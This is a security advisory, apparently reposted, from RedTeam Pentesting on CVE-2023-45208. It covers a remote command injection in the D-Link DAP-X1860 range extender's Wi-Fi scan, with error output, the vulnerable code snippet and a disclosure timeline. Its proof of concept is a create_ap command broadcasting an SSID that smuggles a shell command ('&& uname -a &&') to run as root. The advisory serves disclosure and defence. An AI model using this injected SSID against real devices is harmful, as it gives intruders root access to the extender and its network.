D-Link DAP-X1860: Remote Command Injection

The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.


Details
=======

Product: D-Link DAP-X1860
Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01, other versions may be affected, too
Fixed Versions: Not fixed
Vulnerability Type: Command Injection
Security Risk: medium
Vendor URL: https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender
Vendor Status: notified, not responding
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-006
Advisory Status: published
CVE: CVE-2023-45208
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208


Introduction
============

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.


More Details
============

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action "GetSiteSurvey". If a Wi-Fi network with an apostrophe (such as `Olaf's Network`) in its SSID is in range of the extender, the setup process will crash repeatedly with the following response from the server:

------------------------------------------------------------------------
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 7        11b/g/n     NONE   In 17       YES      NO
1   1   *****               **:**:**:**:**:** WPA2PSK/AES            24       11b/g/n     NONE   In 13 YES      NO
2   1   *****               **:**:**:**:**:** WPA2PSK/AES            47       11b/g/n/ax  NONE   In 13 YES      NO
3   1   *****               **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES  81       11b/g/n     NONE   In 7 YES      NO
4   1   *****               **:**:**:**:**:** WPA2PSKWPA3PSK/AES     63       11b/g/n/ax  NONE   In 19 YES      NO
5   1   *****               **:**:**:**:**:** WPA2PSK/AES            44       11b/g/n/ax  NONE   In 5 NO      NO
6   1   Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
------------------------------------------------------------------------ 

The output `sh: 7: not found` indicates that the extender attempted to
execute some command and the apostrophe that was originally present in the Wi-Fi network `Olaf's Network` is missing in the output. Additionally, the sixth line does not have the same alignment of spaces compared to the other lines.

This alone can be exploited as a denial-of-service-vulnerability as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, it was attempted to inject the command `uname -a` which lists general kernel information. To do this, a Wi-Fi network within range was created with a SSID starting with a single quote and the command separated by the logical shell operator "&&". The network was started using create_ap [1]:

------------------------------------------------------------------------
$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
------------------------------------------------------------------------ 

After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:

------------------------------------------------------------------------
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 0        11b/g/n     NONE   In 17       YES      NO
1   1   Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[...]
sh: 40: not
------------------------------------------------------------------------ 

As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device including the injected commands run as the high-privileged root user. 

The vulnerability originates from the `parsing_xml_stasurvey` function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:

------------------------------------------------------------------------
[...]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[...]
------------------------------------------------------------------------ 


Proof of Concept
================

Create a Wi-Fi network with an SSID containing a single quote, followed by some shell command separator, e.g. "&&" and the command to be run. In the following, create_ap[1] was used to create the Wi-Fi network:

------------------------------------------------------------------------
$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
------------------------------------------------------------------------ 

To trigger the exploit, run the setup process of the range extender, or if it is already configured, run a network scan. The output of the command can be seen in HTTP responses of the extender's web interface.

Security Risk
=============

Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender's local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender such that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.


Timeline
========

2023-05-06 Vulnerability identified
2023-05-08 Reported to [email protected]
2023-06-19 After receiving no reply, a reminder was sent to [email protected]
2023-07-21 After again receiving no reply, a D-Link security contact known from
a previous disclosure was notified directly
2023-08-07 After again receiving no reply, another reminder sent to
[email protected]
2023-10-05 CVE ID requested
2023-10-05 CVE ID assigned
2023-10-09 Advisory released


References
==========

[1]: https://github.com/oblique/create_ap


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. 

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

原文始发于redteam-pentesting：D-Link DAP-X1860: Remote Command Injection